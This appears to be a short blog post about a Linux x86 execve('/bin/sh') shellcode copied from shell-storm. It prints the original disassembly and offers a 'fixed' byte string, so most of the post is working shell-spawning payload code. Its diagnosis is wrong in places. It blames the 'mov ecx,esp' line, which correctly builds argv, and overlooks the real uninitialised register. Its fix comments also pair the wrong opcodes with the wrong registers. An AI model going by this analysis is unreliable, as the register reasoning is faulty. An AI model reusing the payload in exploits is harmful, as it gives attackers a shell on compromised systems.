Uncovering a Hidden Shellcode Vulnerability

Have you ever found yourself using shellcode, only to discover that it’s broken? It happened to me recently. 

While experimenting with shellcode from a seemingly functional source  (https://shell-storm.org/shellcode/files/shellcode-827.html), I discovered a hidden vulnerability. 

It took me a while to spot the problem; can you?

0:  31 c0                   xor    eax,eax
2:  50                      push   eax
3:  68 2f 2f 73 68          push   0x68732f2f
8:  68 2f 62 69 6e          push   0x6e69622f
d:  89 e3                   mov    ebx,esp
f:  50                      push   eax
10: 53                      push   ebx
11: 89 e1                   mov    ecx,esp
13: b0 0b                   mov    al,0xb
15: cd 80                   int    0x80

‍

Spotting the Vulnerability

The suspicious line is:

89 e1                   mov    ecx,esp

‍

To uncover the root of the issue, I started with what I already knew. The goal was to execute:

int execve(const char *pathname, char *const argv[], char *const envp[]);

‍

In order to do this, you need:

• The first argument as /bin/sh. That’s what the two pushes do in the disassembly
• The second argument is NULL.
• The third argument is NULL.

‍

But wait: The suspicious line is moving a value that was not initialized! It is effectively becoming the second argument to execve, and it will be whatever junk is left in ecx, resulting in unpredictable behavior. 

This issue can be categorized as a CWE-457: uninitialized value vulnerability.

‍

Fixing the Shellcode

The solution lies in initializing the ecx and edx registers before they are used as arguments for execve. Prepending two instructions to the shellcode makes it work:

xor edx, edx  ; \x31\xc9 
xor ecx, ecx  ; \x31\xd2

‍

So the final working shellcode would be:

shellcode = b"\x31\xc0\x31\xc9\x31\xd2\xB0\x0B\x51\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\xCD\x80"

‍

Disassembled:

0:  31 c0                   xor    eax,eax  
2:  31 c9                   xor    ecx,ecx   ;; added instruction
4:  31 d2                   xor    edx,edx   ;; added instruction
6:  b0 0b                   mov    al,0xb  
8:  51                      push   ecx  
9:  68 2f 2f 73 68          push   0x68732f2f  
e:  68 2f 62 69 6e          push   0x6e69622f  
13: 89 e3                   mov    ebx,esp  
15: cd 80                   int    0x80

‍

By taking this approach, the shellcode vulnerability is effectively addressed, and the code works as intended. 

This serves as a reminder that even seemingly functional code can harbor subtle vulnerabilities that require careful analysis and remediation. In the realm of shellcode, paying close attention to instruction sequences can make all the difference between success and unexpected failures.

‍

{{code-cta}}